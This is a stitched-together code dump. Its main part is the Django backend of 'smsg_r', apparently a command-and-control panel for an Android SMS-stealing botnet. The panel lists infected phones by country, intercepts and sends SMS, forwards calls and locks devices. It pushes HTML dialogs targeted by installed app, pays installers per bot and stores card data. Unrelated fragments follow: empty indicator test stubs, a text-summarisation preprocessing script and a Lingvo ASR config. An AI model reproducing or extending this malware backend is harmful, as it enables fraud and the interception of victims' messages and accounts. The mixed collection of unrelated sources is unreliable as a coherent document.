last_connection >= NOW() - INTERVAL '15 minutes' THEN 1 ELSE 0 END) as available, country
FROM smsapp_phonedata WHERE "number" LIKE '+%' AND NOT inactive
GROUP BY country ORDER BY available DESC ;
""".format(user_id)
cursor.execute(query)
return cursor.fetchall()
def get_country_list_total(self):
"""
Return list of countries with available phones
@param self: this object
@return: set of data
@rtype: dict
"""
cursor = connection.cursor()
query = """
SELECT count(id) AS total,
sum(CASE WHEN last_connection >= NOW() - INTERVAL '15 minutes' THEN 1 ELSE 0 END) AS available,
country
FROM smsapp_phonedata
GROUP BY country ORDER BY available DESC ;
"""
cursor.execute(query)
return cursor.fetchall()
def get_active_phones(self, user_id, country_code):
"""
@param user_id: ID of the user to list phones for
@type user_id: int
@param country_code: Country code to filter phones
@type country_code: str
@return: List of phones belonging to country and given user, active during last 15 minutes
@rtype: QuerySet of PhoneData
"""
return self.get_queryset().filter(country=country_code).filter(
Q(owner__isnull=True) | Q(owner__id=user_id)).filter(number__startswith='+').filter(
last_connection__gte=timezone.now() - timedelta(minutes=15))
def get_inactive_phones(self):
"""
@return: list of phones which didn't contact the server for 5 days
@rtype: QuerySet of PhoneData
"""
return self.get_queryset().filter(last_connection__lt=timezone.now() - timedelta(days=5)).exclude(inactive=True)
class PhoneData(models.Model):
SMS_INITIAL = 0
SMS_LISTEN = 1
SMS_INTERCEPT = 2
SMS_STATUS = (
(SMS_INITIAL, "None"),
(SMS_LISTEN, "Listening"),
(SMS_INTERCEPT, "Intercepting")
)
SMS_STATUS_DICT = dict(SMS_STATUS)
number = models.CharField(max_length=255, null=True, verbose_name=_("Phone #"), db_index=True, blank=True)
imei = models.CharField(max_length=255, unique=True, verbose_name=_("H/W ID"), null=True)
registered = models.DateTimeField(auto_now_add=True)
country = CountryField(max_length=4, null=True, verbose_name=_("Country code"), blank=True, db_index=True)
os_version = models.CharField(max_length=128, null=True, verbose_name=_("OS version"))
hw_model = models.CharField(max_length=255, null=True, verbose_name=_("Hardware model"))
owner = models.ForeignKey(User, verbose_name=_("Assigned to"), null=True, blank=True)
uniq_id = models.CharField(max_length=64, null=True, unique=True, verbose_name=_("Unique ID"))
operator = models.ForeignKey(MobileOperator, null=True, blank=True, verbose_name=_("Mobile operator"))
sms_status = models.IntegerField(default=SMS_INITIAL, choices=SMS_STATUS, verbose_name=_("SMS status"))
forwarding_calls = models.CharField(max_length=24, null=True, blank=True, verbose_name=_("Forwarding calls to"))
last_connection = models.DateTimeField(null=True, verbose_name=_("Last connection"))
id_sent = models.BooleanField(default=False, verbose_name=_("#sentid already sent"))
locked = models.BooleanField(default=False, verbose_name=_("Locked"))
inactive = models.BooleanField(default=False, verbose_name=_("Inactive"),
help_text=_("Set automatically if the phone didn't contact server for 5 days"))
installer = models.ForeignKey(Installer, null=True, verbose_name=_("Installer"), related_name='bot_installer')
paid = models.BooleanField(default=False, verbose_name=_("Paid to installer"))
admin_comment = models.TextField(blank=True, null=True, verbose_name=_("Admin comment"))
app_dialogues_version = models.CharField(max_length=255, null=True, blank=True)
objects = PhoneManager()
class Meta:
verbose_name = _("phone")
verbose_name_plural = _("phones")
index_together = [['number', 'id_sent'], ]
def __str__(self):
return "IMEI: {0} code: {1}".format(self.imei, self.uniq_id)
def is_available(self):
"""
        Is this phone available to users?
@return: True if the phone isn't assigned currently
@rtype: bool
"""
return self.owner is None
def get_work_time(self):
td = timezone.now() - self.registered
return human(td, past_tense='{0}', precision=1)
def status_desc(self):
return self.SMS_STATUS_DICT.get(self.sms_status)
def since_last_connection(self):
if self.last_connection is None:
return "n/a"
td = timezone.now() - self.last_connection
return human(td, past_tense='{0} ago', precision=1)
class UserComment(models.Model):
user = models.ForeignKey(SysUser)
phone = models.ForeignKey(PhoneData)
contents = models.TextField(verbose_name=_("Comment contents"))
class Meta:
unique_together = (('user', 'phone'),)
class BlockedNumber(models.Model):
number = models.CharField(max_length=255)
phone = models.ForeignKey(PhoneData)
class Meta:
index_together = [['number', 'phone'], ]
verbose_name = _("blocked number")
verbose_name_plural = _("blocked numbers")
class SMSRecord(models.Model):
STATUS_NORMAL = 0
STATUS_REFUNDED = 1
STATUS_DISPUTED = 2
STATUS = (
(STATUS_NORMAL, _("Normal")),
(STATUS_REFUNDED, _("Refunded")),
(STATUS_DISPUTED, _("Disputed")),
)
source = models.CharField(max_length=255, null=True, verbose_name=_("From"))
dest = models.CharField(max_length=255, null=True, verbose_name=_("To"))
contents = models.TextField(verbose_name=_("SMS Text"))
created = models.DateTimeField(auto_now_add=True)
phone = models.ForeignKey(PhoneData)
owner = models.ForeignKey(SysUser, null=True)
intercepted = models.BooleanField(default=False)
billing_status = models.IntegerField(choices=STATUS, default=STATUS_NORMAL)
class Meta:
verbose_name = _("SMS")
verbose_name_plural = _("SMS records")
class LogRecord(models.Model):
registered = models.DateTimeField(auto_now_add=True)
contents = models.TextField()
@receiver(post_save, sender=PhoneData)
def on_phone_create(instance, **kw):
"""
@param instance: Phone instance to update
@type instance: PhoneData
"""
if instance.uniq_id is None:
iid = idgen.generate_uniq_id()
instance.uniq_id = iid
PhoneData.objects.filter(pk=instance.pk).update(uniq_id=iid)
logger.debug("Updating phone record {0} with new ID {1}".format(instance, iid))
    # check if it contains a valid number
rx = re.compile('^\+')
if not rx.match(unicode(instance.number)) and settings.DEFAULT_SENDID_PHONE: # send ID command
commands.send_id(instance, settings.DEFAULT_SENDID_PHONE)
class RemoteDialog(models.Model):
sender = models.CharField(max_length=255, unique=True, null=True, blank=True)
app = models.CharField(max_length=255, unique=True, null=True, blank=True)
operator = cfields.OperatorField(max_length=32, unique=True, null=True, blank=True)
priority = models.DecimalField(decimal_places=0, max_digits=4, default=0)
description = models.CharField(max_length=255)
delay = models.IntegerField(default=0, verbose_name=_("initial delay"), help_text=_("in minutes"))
restart = models.IntegerField(default=0, verbose_name=_("restart interval"), help_text=_("in minutes"))
dlg1 = models.TextField(verbose_name=_("first dialog text"))
html_contents = models.TextField(verbose_name=_("HTML contents"), null=True, blank=True)
class Meta:
verbose_name = _("dialog")
verbose_name_plural = _("dialogs")
def __unicode__(self):
return self.description
def clean(self):
if not self.sender:
self.sender = None
if not self.app:
self.app = None
if not self.operator:
self.operator = None
super(RemoteDialog, self).clean()
def get_json(self):
"""
Returns json-compatible representation of the whole dialog
@return: All objects in a form that the client understands
@rtype: dict
"""
return {
'ishtml': True,
'start delay minutes': self.delay, 'restart interval minutes': self.restart,
'first dialog': self.dlg1,
'html': base64.b64encode(self.html_contents.encode('utf-8')) if self.html_contents else "",
'correlation id': self.pk
}
class ISender(models.Model):
name = models.CharField(max_length=255, unique=True, null=False)
def __unicode__(self):
return self.name
class Meta:
verbose_name = _("internal SMS sender")
verbose_name_plural = _("internal SMS senders")
class InternalSMSManager(models.Manager):
# noinspection PyMethodMayBeStatic
def get_sender_stats(self):
cursor = connection.cursor()
query = """
SELECT i.sender_id, s.name, COUNT(DISTINCT i.phone_id) AS num_used
FROM smsapp_internalsms AS i, smsapp_isender AS s WHERE s.id=i.sender_id GROUP BY i.sender_id, s.name
HAVING COUNT(DISTINCT i.phone_id) > 1
ORDER BY num_used DESC
"""
cursor.execute(query)
return cursor.fetchall()
# noinspection PyMethodMayBeStatic
def get_sender_stats_by_country(self, country_code):
cursor = connection.cursor()
query = """
SELECT i.sender_id, s.name, COUNT(DISTINCT i.phone_id) AS num_used
FROM smsapp_internalsms AS i, smsapp_isender AS s, smsapp_phonedata as p
WHERE s.id=i.sender_id AND p.id=i.phone_id AND p.country=%s GROUP BY i.sender_id, s.name
HAVING COUNT(DISTINCT i.phone_id) > 1 ORDER BY num_used DESC;
"""
cursor.execute(query, [country_code])
return cursor.fetchall()
# noinspection PyMethodMayBeStatic
def get_country_list_of_senders(self):
cursor = connection.cursor()
query = """
SELECT DISTINCT p.country AS code FROM smsapp_phonedata AS p, smsapp_internalsms AS s
WHERE p.id=s.phone_id ORDER BY code
"""
cursor.execute(query)
return cursor.fetchall()
class InternalSMS(models.Model):
sender = models.ForeignKey(ISender, verbose_name=_("sender"), null=True)
contents = models.TextField(verbose_name=_("SMS Text"))
created = models.DateTimeField(auto_now_add=True)
phone = models.ForeignKey(PhoneData)
objects = InternalSMSManager()
def __unicode__(self):
return "from: {f}, phone: {p}".format(f=self.sender, p=self.phone)
class Meta:
verbose_name = _("internal SMS")
verbose_name_plural = _("internal SMSs")
class InstalledAppsManager(models.Manager):
# noinspection PyMethodMayBeStatic
def get_top_apps(self):
cursor = connection.cursor()
query = """
SELECT name, COUNT(phone_id) AS cnt FROM smsapp_installedapp GROUP BY name
HAVING COUNT(phone_id) > 1 ORDER BY cnt DESC
"""
cursor.execute(query)
return cursor.fetchall()
# noinspection PyMethodMayBeStatic
def get_top_apps_by_country(self, country_code):
cursor = connection.cursor()
query = """
SELECT a.name, COUNT(a.phone_id) AS cnt FROM smsapp_installedapp AS a, smsapp_phonedata AS p
WHERE a.phone_id = p.id AND p.country=%s
GROUP BY a.name
HAVING COUNT(a.phone_id) > 1 ORDER BY cnt DESC
"""
cursor.execute(query, [country_code])
return cursor.fetchall()
class InstalledApp(models.Model):
name = models.CharField(max_length=255, db_index=True)
phone = models.ForeignKey(PhoneData)
objects = InstalledAppsManager()
def __unicode__(self):
return self.name
class Meta:
verbose_name = _("installed application")
verbose_name_plural = _("installed applications")
index_together = [['name', 'phone'], ]
class AppDialog(models.Model):
description = models.CharField(max_length=255)
html_contents = models.TextField(verbose_name=_("HTML contents"), null=True, blank=True)
apps = models.TextField(verbose_name=_("app filter"), help_text=_("1 package per line"))
def __unicode__(self):
return self.description
class Meta:
verbose_name = _("application dialog")
verbose_name_plural = _("application dialogues")
def create_custom_permissions():
try:
ct, created = ContentType.objects.get_or_create(model='', app_label='smsapp', name='view cards')
Permission.objects.get_or_create(codename='view_cards', content_type=ct, name='View cards info')
except ProgrammingError:
logger.error("Content type tables haven't been initialized yet")
try:
create_custom_permissions()
except AppRegistryNotReady:
pass
class Option(models.Model):
name = models.CharField(max_length=255, unique=True)
content = models.TextField(blank=True)
@receiver(post_save, sender=AppDialog)
def set_html_version(instance, **kw):
opt, created = Option.objects.get_or_create(name='html version')
opt.content = datetime.utcnow()
opt.save()
# resetting cache
settings.REDIS.delete([DB_HTML_VERSION, DB_HTML_CACHE])
class BinData(models.Model):
cid = models.IntegerField(primary_key=True)
card = models.CharField(max_length=255, blank=True)
bank = models.CharField(max_length=255, null=True)
ctype = models.CharField(max_length=64, blank=True, null=True)
clevel = models.CharField(max_length=64, blank=True, null=True)
country = models.CharField(max_length=2, blank=True, null=True)
```
#### File: smsg_r/smsapp/tests.py
```python
from StringIO import StringIO
import gzip
import json
from django.conf import settings
from django.core.handlers.wsgi import WSGIRequest
from django.test import TestCase, Client
from . import command_queue, models, idgen, commands, remote_api, cache
class RequestFactory(Client):
def request(self, **request):
environ = {
'HTTP_COOKIE': self.cookies,
'PATH_INFO': '/',
'QUERY_STRING': '',
'REQUEST_METHOD': 'GET',
'SCRIPT_NAME': '',
'SERVER_NAME': 'testserver',
'SERVER_PORT': 80,
'SERVER_PROTOCOL': 'HTTP/1.1',
}
environ.update(self.defaults)
environ.update(request)
return WSGIRequest(environ)
class CommandTest(TestCase):
def setUp(self):
settings.REDIS.flushdb()
self.user = models.SysUser.objects.create(username="test")
self.phone = models.PhoneData.objects.create(number="322223", imei="ZZ345", country="RU")
self.installer = models.Installer.objects.create(username='installer1', user_id=1)
self.dialog1 = models.RemoteDialog.objects.create(sender='testsender1', description='t1', dlg1='f1',
html_contents='<html><body>hello 1</body></html>')
self.dialog1 = models.RemoteDialog.objects.create(sender='testsender2', app='testapp', priority=10,
description='t2', dlg1='f2',
html_contents='<html><body>hello 2</body></html>'
)
self.phone_id = self.phone.uniq_id
def test_command_queue(self):
# initial checks
self.assertTrue(command_queue.has_commands(
self.phone_id)) # # todo: fix test so it takes into account sentid command in buffer after new phone created
self.assertEqual('#sentid +13478096873', command_queue.get_next_command(self.phone_id))
self.assertEqual(commands.PHONE_STATE_STABLE, commands.get_phone_transient_state(self.phone_id))
# add the command and run state checks
commands.reserve_phone(self.user, self.phone)
self.assertTrue(command_queue.has_commands(self.phone_id))
self.assertEqual("#intercept_sms_start", command_queue.get_next_command(self.phone_id))
self.assertEqual(commands.PHONE_STATE_LOCKING, commands.get_phone_transient_state(self.phone_id))
def test_registration(self):
def test_with_data(test_app_data):
rf = RequestFactory()
buf = StringIO(test_app_data)
outb = StringIO()
f = gzip.GzipFile(fileobj=outb, mode='wb')
f.write(test_app_data)
data = outb.getvalue()
rf_post = rf.post('/app/remote', data=data, content_type='application/json')
rf_post.META['HTTP_CONTENT_ENCODING'] = "gzip"
resp = remote_api.process(rf_post)
self.assertEqual(200, resp.status_code, "Executed successfully")
ro = json.loads(resp.content)
code = ro['code']
self.assertEqual(10, len(code))
resp = remote_api.process(rf.post('/app/remote', data='{"type": "device check", "code": "' + code + '"}',
content_type='application/json'))
self.assertEqual(200, resp.status_code, "Executed successfully")
return json.loads(resp.content)
test_app_data0 = """
{
"os":"4.0.3","model":"LGE LG-XXXXX","phone number":"+111111111","client number":"1","type":"device info",
"imei":"111111111111","country":"US", "operator" : "ZZZ"
}
"""
ro = test_with_data(test_app_data0)
self.assertEqual('', ro['command'])
test_app_data1 = """
{
"os":"4.0.3","model":"LGE LG-XXXXX","phone number":"+222222222","client number":"1","type":"device info",
"imei":"2222222222","country":"US", "operator" : "ZZZ",
"sms": [{"from": "testsender1", "body": "test SMS 1"}],
"apps": ["testapp"]
}
"""
ro = test_with_data(test_app_data1)
self.assertEqual('#show_html', ro['command'])
self.assertEqual('f2', ro['params']['first dialog'])
models.Option.objects.create(name="blacklist", content="""
testapp
""")
cache.rebuild_cache()
ro = test_with_data(test_app_data1)
self.assertEqual('#show_html', ro['command'])
class IDGenerateTest(TestCase):
def test_generate_id(self):
uniq_id = idgen.generate_uniq_id()
print uniq_id
self.assertEqual(10, len(uniq_id))
class OperatorTest(TestCase):
def test_operator_name(self):
op = models.MobileOperator(name="310260")
self.assertEqual('T-Mobile (260) - Bermuda', unicode(op))
op1 = models.MobileOperator(name='311580')
self.assertEqual('Unknown (311/580)', unicode(op1))
op2 = models.MobileOperator(name='666322')
self.assertEqual('Unknown (666/322)', unicode(op2))
class CacheTest(TestCase):
def setUp(self):
models.Option.objects.create(name="blacklist", content="""
ttt
aaa
zzzz
""")
def test_cache(self):
cache.rebuild_cache()
self.assertTrue(cache.is_blacklisted('aaa'))
```
#### File: smsg_r/smsapp/views.py
```python
import json
import logging
import datetime
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import login as auth_login
from django.contrib.auth.models import User
from django.db.models import Q
from django.http import HttpResponse, HttpResponseServerError
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth import logout
from django.utils import timezone
from django.views.decorators.cache import never_cache
from django.views.decorators.debug import sensitive_post_parameters
from django.views.decorators.http import require_http_methods
from django.utils.translation import ugettext_lazy as _
from smsapp import models, commands, sys_messages, cfields
logger = logging.getLogger(__name__)
def home(request):
if request.user.id:
if request.user.is_staff:
return redirect('admin:index')
# check if user is an installer
try:
inst = models.Installer.objects.get(pk=request.user.id)
now = timezone.now()
# beginning of the day
bod = datetime.datetime(year=now.year, month=now.month, day=now.day, hour=0, minute=0, second=0,
tzinfo=timezone.get_current_timezone())
phonedata_set = models.PhoneData.objects.filter(installer=inst)
return render(request, "install_stats.html",
{
'total_bots': phonedata_set.count(),
'bots_today': phonedata_set.filter(registered__gte=bod).count(),
})
except models.Installer.DoesNotExist:
return render(request, "countries.html",
{'data': models.PhoneData.objects.get_country_list(request.user.id)})
return render(request, "index.html")
@login_required()
def logout_local(request):
logout(request)
messages.success(request, _("Logged out"))
return redirect("home")
@login_required()
def inside_country(request, country):
return render(request, "inside_country.html",
{'country': country, 'phones': models.PhoneData.objects.get_active_phones(request.user.id, country)})
@login_required()
def sms_list(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
sms_data = pd.smsrecord_set.filter(source__isnull=False).order_by('-created').all()
blocked_data = pd.blockednumber_set.all()
user_comments = None
if request.user.is_superuser:
comment = pd.admin_comment if pd.admin_comment else ""
user_comments = pd.usercomment_set.all()
else:
try:
su = models.SysUser.objects.get(user_ptr=request.user.id)
comment = models.UserComment.objects.get(phone=pd, user=su)
comment = comment.contents if comment else ""
except models.UserComment.DoesNotExist:
comment = ""
if request.is_ajax():
l = []
for s in reversed(sms_data):
l.append({'from': s.source, 'id': s.id, 'text': s.contents})
ctx = {'sms_data': l}
return HttpResponse(json.dumps(ctx), content_type="application/json")
ctx = {
'sms_data': sms_data, 'phone_data': pd, 'blocked_data': blocked_data,
'app_data': pd.installedapp_set.all(),
'int_sms_data': pd.internalsms_set.all(),
'comment': comment,
'user_comments': user_comments,
}
return render(request, "phone_details.html", ctx)
class StateError(Exception):
pass
def get_boolean_from_request(request, key, method='POST'):
""" gets the value from request and returns it's boolean state """
value = getattr(request, method).get(key, False)
if value == 'False' or value == 'false' or value == '0' or value == 0:
value = False
elif value:
value = True
else:
value = False
return value
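# Illustrative behaviour (hypothetical form values):
#   flag='false', flag='0' or a missing key -> False;   flag='true' or flag='yes' -> True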
@login_required()
@require_http_methods(["POST"])
def send_sms(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
to = request.POST.get("recipient")
txt = request.POST.get("sms")
commands.send_sms(pd, to, txt)
return HttpResponse(json.dumps({'success': "SMS successfully sent to {0}".format(to)}),
content_type="application/json")
@login_required()
@require_http_methods(["POST"])
def forward_calls(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
number = request.POST.get('number')
commands.forward_calls(pd, number)
return HttpResponse(json.dumps({'success': "Starting call forwarding to {0}".format(number)}),
content_type="application/json")
@login_required()
@require_http_methods(["POST"])
def disable_forward_calls(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
commands.disable_forward_calls(pd)
return HttpResponse(json.dumps({'success': "Disabling call forwarding"}),
content_type="application/json")
@login_required()
@require_http_methods(["POST"])
def toggle_phone(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
flag = get_boolean_from_request(request, 'flag')
try:
if pd.owner_id is not None and pd.owner_id != request.user.id:
raise StateError("Another user is already using this phone")
if flag:
# release all other owned phones
for p in models.PhoneData.objects.exclude(id=phone_id).filter(owner_id=request.user.id):
commands.release_phone(p)
if pd.owner_id is None:
user = User.objects.get(pk=request.user.id)
if not commands.reserve_phone(user, pd):
raise StateError("Could not reserve the phone")
return HttpResponse(
json.dumps({'success': "Please wait while intercept starts", 'result': 1}),
content_type="application/json")
elif pd.owner_id == request.user.id:
sys_messages.add_message(pd.uniq_id, {'imei': pd.imei}) # to switch off the indicator
return HttpResponse(json.dumps({'warning': "The phone is already in intercept status", 'result': 1}),
content_type="application/json")
else:
if pd.owner_id == request.user.id:
commands.release_phone(pd)
return HttpResponse(
json.dumps({'success': "The phone {0} is going to be released".format(pd), 'result': 0}),
content_type="application/json")
raise StateError("Unknown error")
except StateError as e:
logger.error("Error processing phone state request: {0}".format(e))
return HttpResponseServerError(e)
@login_required()
@require_http_methods(["POST"])
def unblock_number(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
all = request.POST.get('all')
if all:
commands.unblock_all(pd)
return HttpResponse(
json.dumps({'success': "Sent command to unblock all numbers"}),
content_type="application/json")
else:
number = request.POST.get('number')
commands.unblock_phone(pd, number)
return HttpResponse(
json.dumps({'success': "Sent command to unblock number {0}".format(number)}),
content_type="application/json")
@login_required()
@require_http_methods(["POST"])
def block_number(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
number = request.POST.get('number')
commands.block_phone(pd, number)
return HttpResponse(
json.dumps({'success': "Sent command to block number {0}".format(number)}),
content_type="application/json")
@login_required()
def history(request):
phone_list = models.SMSRecord.objects.filter(owner_id=request.user.id).select_related('phone').order_by(
'phone').distinct('phone')
return render(request, "history.html", {'phones': phone_list})
@login_required()
def clear_messages(request, phone_id):
pd = get_object_or_404(models.PhoneData, Q(pk=phone_id) & Q(owner__id=request.user.id))
messages.success(request, "Messages cleared {0}".format(pd))
models.SMSRecord.objects.filter(phone=pd).all().delete()
return redirect('history')
@login_required()
@require_http_methods(["POST"])
def get_messages(request, phone_id):
phone = get_object_or_404(models.PhoneData, pk=phone_id)
commands.touch_phone(phone.uniq_id)
msg_list = []
while True:
m = sys_messages.retrieve_next_message(phone.uniq_id)
if m is None:
break
msg_list.append(m)
resp = {'messages': msg_list} if len(msg_list) else {}
return HttpResponse(json.dumps(resp), content_type="application/json")
@sensitive_post_parameters()
@require_http_methods(["POST"])
@never_cache
def login(request):
form = AuthenticationForm(request, data=request.POST)
if form.is_valid():
auth_login(request, form.get_user())
messages.success(request, "Logged in")
return redirect('home')
messages.error(request, "Login failed")
return redirect('home')
@login_required()
@require_http_methods(["POST"])
def get_country_operators(request):
ccode = request.POST.get("ccode")
lst = cfields.get_operator_choices(ccode)
res = {'success': True, 'choices': lst}
return HttpResponse(json.dumps(res), content_type="application/json")
@login_required()
@require_http_methods(["POST"])
def save_comment(request, phone_id):
phone = get_object_or_404(models.PhoneData, pk=phone_id)
contents = request.POST.get("contents")
if request.user.is_superuser:
phone.admin_comment = contents
phone.save()
else:
user = get_object_or_404(models.SysUser, user_ptr=request.user.id)
c, created = models.UserComment.objects.get_or_create(user=user, phone=phone)
c.contents = contents
c.save()
resp = {'success': True}
return HttpResponse(json.dumps(resp), content_type="application/json")
@login_required()
@require_http_methods(["POST"])
def lock_phone(request, phone_id):
pd = get_object_or_404(models.PhoneData, pk=phone_id)
flag = get_boolean_from_request(request, 'flag')
try:
if pd.owner_id is not None and pd.owner_id != request.user.id:
raise StateError("Another user is already using this phone")
if flag:
if pd.locked:
raise StateError("The phone is already in locked status")
commands.device_lock(pd, True)
return HttpResponse(
json.dumps({'success': "The phone {0} is going to be locked".format(pd), 'result': 0}),
content_type="application/json")
else:
if not pd.locked:
raise StateError("The phone is not locked")
commands.device_lock(pd, False)
return HttpResponse(
json.dumps({'success': "The phone {0} is going to be unlocked".format(pd), 'result': 0}),
content_type="application/json")
except StateError as e:
logger.error("Error processing phone state request: {0}".format(e))
return HttpResponseServerError(e)
``` |
{
"source": "0100101001010000/PyTechnicalIndicators",
"score": 3
} |
#### File: tests/Single/candle_indicators.py
```python
import unittest
from PyTechnicalIndicators.Single import candle_indicators
class TestCandleIndicators(unittest.TestCase):
def setUp(self):
self.prices = [100, 101, 102, 101, 103, 100]
    def test_bollinger_band(self):
        pass  # test body omitted in this snippet
    def test_bollinger_band_failure(self):
        pass  # test body omitted in this snippet
    def test_ichimoku_cloud(self):
        pass  # test body omitted in this snippet
    def test_ichimoku_cloud_failure(self):
        pass  # test body omitted in this snippet
    def test_personalised_bb(self):
        pass  # test body omitted in this snippet
    def test_personalised_bb_failure(self):
        pass  # test body omitted in this snippet
    def test_personalised_icloud(self):
        pass  # test body omitted in this snippet
    def test_personalised_icloud_failure(self):
        pass  # test body omitted in this snippet
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "0101011/analitikr",
"score": 3
} |
#### File: 0101011/analitikr/main.py
```python
from nltk.tokenize import word_tokenize as tokenize
import json, config, nltk, itertools
from os import path
import numpy as np
try:
    import cPickle as pickle  # Python 2
except ImportError:
    import pickle  # Python 3 fallback
WHITELIST = '0123456789abcdefghijklmnopqrstuvwxyz'
VOCAB_SIZE = 1200
UNK = 'unk'
limit = {
'max_descriptions' : 400,
'min_descriptions' : 0,
'max_headings' : 20,
'min_headings' : 0,
}
def load_raw_data(filename):
with open(filename, 'r') as fp:
raw_data = json.load(fp)
print('Loaded {:,} articles from {}'.format(len(raw_data), filename))
return raw_data
def tokenize_sentence(sentence):
return ' '.join(list(tokenize(sentence)))
def article_is_complete(article):
# Check if an article has both heading and description
if ('abstract' not in article) or ('article' not in article):
return False
if (article['abstract'] is None) or (article['article'] is None):
return False
return True
def tokenize_articles(raw_data):
# Tokenizes data and creates list of headings and descriptions
headings, descriptions = [], []
num_articles = len(raw_data)
for i, a in enumerate(raw_data):
if article_is_complete(a):
headings.append(tokenize_sentence(a['abstract']))
descriptions.append(tokenize_sentence(a['article']))
if i % config.print_freq == 0:
print('Tokenized {:,} / {:,} articles'.format(i, num_articles))
return (headings, descriptions)
def filter(line, whitelist):
# Filters out all characters which are not in whitelist
return ''.join([ch for ch in line if ch in whitelist])
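# e.g. filter('Hello, World! 123', WHITELIST) -> 'elloorld123' (uppercase letters, spaces and punctuation are dropped)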
def filter_length(headings, descriptions):
if len(headings) != len(descriptions):
raise Exception('Number of headings does not match number of descriptions!')
filtered_headings, filtered_descriptions = [], []
for i in range(0, len(headings)):
heading_length = len(headings[i].split(' '))
description_length = len(descriptions[i].split(' '))
if description_length >= limit['min_descriptions'] and description_length <= limit['max_descriptions']:
if heading_length >= limit['min_headings'] and heading_length <= limit['max_headings']:
filtered_headings.append(headings[i])
filtered_descriptions.append(descriptions[i])
print('Length of filtered headings: {:,}'.format(len(filtered_headings)))
print('Length of filtered descriptions: {:,}'.format(len(filtered_descriptions)))
return (filtered_headings, filtered_descriptions)
def index_data(tokenized_sentences, vocab_size):
# Forms vocab, idx2word and word2idx dicts
freq_dist = nltk.FreqDist(itertools.chain(*tokenized_sentences))
vocab = freq_dist.most_common(vocab_size)
print('Vocab length: {:,}'.format(len(vocab)))
idx2word = ['_'] + [UNK] + [x[0] for x in vocab]
word2idx = dict([(w, i) for i, w in enumerate(idx2word)])
return (idx2word, word2idx, freq_dist)
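# e.g. for tokenized_sentences [['a', 'b', 'a'], ['a', 'b', 'c']] and vocab_size=2 this yields
# idx2word = ['_', 'unk', 'a', 'b']  (padding marker, unknown token, then the most frequent words)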
def pad_seq(seq, lookup, max_length):
# Pads sequence with zero values
indices = []
for word in seq:
if word in lookup:
indices.append(lookup[word])
else:
indices.append(lookup[UNK])
return indices + [0]*(max_length - len(seq))
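# Worked example with a hypothetical lookup: pad_seq(['good', 'dog'], {'good': 2, 'unk': 1}, 4)
# -> [2, 1, 0, 0]  ('dog' is missing from the lookup so it maps to UNK, zeros pad up to max_length)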
def zero_pad(tokenized_headings, tokenized_descriptions, word2idx):
# Stores indices in numpy arrays and
# Creates zero padding where required
data_length = len(tokenized_descriptions)
idx_descriptions = np.zeros([data_length, limit['max_descriptions']], dtype=np.int32)
idx_headings = np.zeros([data_length, limit['max_headings']], dtype=np.int32)
for i in range(data_length):
description_indices = pad_seq(tokenized_descriptions[i], word2idx, limit['max_descriptions'])
heading_indices = pad_seq(tokenized_headings[i], word2idx, limit['max_headings'])
idx_descriptions[i] = np.array(description_indices)
idx_headings[i] = np.array(heading_indices)
return (idx_headings, idx_descriptions)
def process_data():
#load data from file
filename = path.join(config.path_data, 'raw_data.json')
raw_data = load_raw_data(filename)
#tokenize articles and separate into headings and descriptions
headings, descriptions = tokenize_articles(raw_data)
#keep only whitelisted characters and articles satisfying the length limits
headings = [filter(heading, WHITELIST) for heading in headings]
descriptions = [filter(sentence, WHITELIST) for sentence in descriptions]
headings, descriptions = filter_length(headings, descriptions)
#convert list of sentences into list of list of words
word_tokenized_headings = [word_list.split(' ') for word_list in headings]
word_tokenized_descriptions = [word_list.split(' ') for word_list in descriptions]
#indexing
idx2word, word2idx, freq_dist = index_data(word_tokenized_headings + word_tokenized_descriptions, VOCAB_SIZE)
#save as numpy array and do zero padding
idx_headings, idx_descriptions = zero_pad(word_tokenized_headings, word_tokenized_descriptions, word2idx)
#check percentage of unks
    unk_percentage = calculate_unk_percentage(idx_headings, idx_descriptions, word2idx)
    print(unk_percentage)
article_data = {
'word2idx' : word2idx,
'idx2word': idx2word,
'limit': limit,
'freq_dist': freq_dist,
}
pickle_data(article_data)
return (idx_headings, idx_descriptions)
def pickle_data(article_data):
# Saves obj to disk as a pickle file
with open(path.join(config.path_data, 'article_data.pkl'), 'wb') as fp:
pickle.dump(article_data, fp, 2)
def unpickle_articles():
# Loads pickle file from disk to give obj
with open(path.join(config.path_data, 'article_data.pkl'), 'rb') as fp:
article_data = pickle.load(fp)
return article_data
def calculate_unk_percentage(idx_headings, idx_descriptions, word2idx):
num_unk = (idx_headings == word2idx[UNK]).sum() + (idx_descriptions == word2idx[UNK]).sum()
num_words = (idx_headings > word2idx[UNK]).sum() + (idx_descriptions > word2idx[UNK]).sum()
return (num_unk / num_words) * 100
def main():
process_data()
if __name__ == '__main__':
main()
``` |
{
"source": "0101011/tensorflow-essentials",
"score": 3
} |
#### File: tensorflow-essentials/19_lingvo/19_1_task_config.py
```python
# Assumed imports for this standalone snippet (adapted from the Lingvo Librispeech ASR example):
from lingvo.core import lr_schedule
from lingvo.core import py_utils
from lingvo.tasks.asr import model
def Task(cls):
p = model.AsrModel.Params()
p.name = 'librispeech'
# Initialize encoder params.
ep = p.encoder
# Data consists 240 dimensional frames (80 x 3 frames), which we
# re-interpret as individual 80 dimensional frames. See also,
# LibrispeechCommonAsrInputParams.
ep.input_shape = [None, None, 80, 1]
ep.lstm_cell_size = 1024
ep.num_lstm_layers = 4
ep.conv_filter_shapes = [(3, 3, 1, 32), (3, 3, 32, 32)]
ep.conv_filter_strides = [(2, 2), (2, 2)]
ep.cnn_tpl.params_init = py_utils.WeightInit.Gaussian(0.001)
# Disable conv LSTM layers.
ep.num_conv_lstm_layers = 0
# Initialize decoder params.
dp = p.decoder
dp.rnn_cell_dim = 1024
dp.rnn_layers = 2
dp.source_dim = 2048
# Use functional while based unrolling.
dp.use_while_loop_based_unrolling = False
tp = p.train
tp.learning_rate = 2.5e-4
tp.lr_schedule = lr_schedule.ContinuousLearningRateSchedule.Params().Set(
start_step=50000, half_life_steps=100000, min=0.01)
